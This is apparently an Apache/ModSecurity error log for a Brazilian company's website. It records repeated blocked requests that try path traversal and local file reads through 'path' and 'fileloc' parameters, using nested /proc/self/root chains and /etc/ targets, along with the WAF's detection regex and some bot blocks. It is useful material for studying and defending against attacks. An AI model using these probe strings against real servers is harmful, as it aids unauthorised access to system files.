[Wed Mar 18 06:13:27.825804 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:57602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpst-oXxyEfFpUF8f89YwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:13:57.308428 2026] [:error] [pid 29882:tid 140411565680384] [client 216.73.216.191:52068] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps1UzinOy1jxa1j4fjfQAAARU"]
[Wed Mar 18 06:14:15.351397 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:57614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps59Y0UrI5A3LftIxolQAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:14:24.073997 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.241.31:39118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps8Ow_le52K8_3pV2xxgAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:14:27.835842 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:58854] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps8wkwaGbbGflqUZDhyQAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:14:34.046987 2026] [:error] [pid 30077:tid 140411674785536] [client 216.73.216.191:53424] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps-vu8EFLIOrSqIpvXPwAAAkg"]
[Wed Mar 18 06:14:34.319038 2026] [:error] [pid 15051:tid 140411565680384] [client 216.73.216.191:53438] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps-imAPhZkrhU8w4k_gQAAAJU"]
[Wed Mar 18 06:14:34.964586 2026] [:error] [pid 17887:tid 140411725141760] [client 216.73.216.191:53470] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps-gkwaGbbGflqUZDhygAAAMI"]
[Wed Mar 18 06:14:35.089118 2026] [:error] [pid 11816:tid 140411540502272] [client 216.73.216.191:53480] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps--w_le52K8_3pV2xzgAAAhg"]
[Wed Mar 18 06:14:35.560002 2026] [:error] [pid 15826:tid 140411691570944] [client 216.73.216.191:53502] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps--oXxyEfFpUF8f89hwAAAUY"]
[Wed Mar 18 06:14:35.982981 2026] [:error] [pid 15826:tid 140411641214720] [client 216.73.216.191:53514] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps--oXxyEfFpUF8f89iAAAAUw"]
[Wed Mar 18 06:14:36.547551 2026] [:error] [pid 30077:tid 140411590858496] [client 216.73.216.191:53542] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps_Pu8EFLIOrSqIpvXQQAAAlI"]
[Wed Mar 18 06:14:37.567642 2026] [:error] [pid 30077:tid 140411641214720] [client 216.73.216.191:53586] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps_fu8EFLIOrSqIpvXQwAAAkw"]
[Wed Mar 18 06:14:37.930963 2026] [:error] [pid 15051:tid 140411699963648] [client 216.73.216.191:53600] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps_SmAPhZkrhU8w4k_hgAAAIU"]
[Wed Mar 18 06:14:38.302893 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.241.31:46252] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abps_kzinOy1jxa1j4fjmQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:14:47.946754 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:49674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptB0zinOy1jxa1j4fjrQAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:15:45.754209 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:57248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptQew_le52K8_3pV2yLAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:15:47.900042 2026] [mime_magic:error] [pid 31803:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:55454] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:16:11.053436 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:51666] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptW-oXxyEfFpUF8f894gAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:16:15.088537 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:34294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptXuyqAr6etmhZHNqNAQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:17:25.341536 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:34302] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptpda6ubjKNq_cu4ZoFAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:17:32.423183 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.228.61:50532] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abptrOyqAr6etmhZHNqNIwAAAFg"]
[Wed Mar 18 06:17:34.617535 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.244.43:47614] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abptrvu8EFLIOrSqIpvXpQAAAkE"]
[Wed Mar 18 06:17:48.496610 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:58054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptvOoXxyEfFpUF8f8-OgAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:17:54.839252 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:35178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptwkzinOy1jxa1j4fkSwAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:18:07.456991 2026] [:error] [pid 29882:tid 140411540502272] [client 74.7.241.31:35180] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abptz0zinOy1jxa1j4fkXgAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:18:24.521562 2026] [mime_magic:error] [pid 19507:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:60672] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:18:30.997633 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.241.31:38732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag 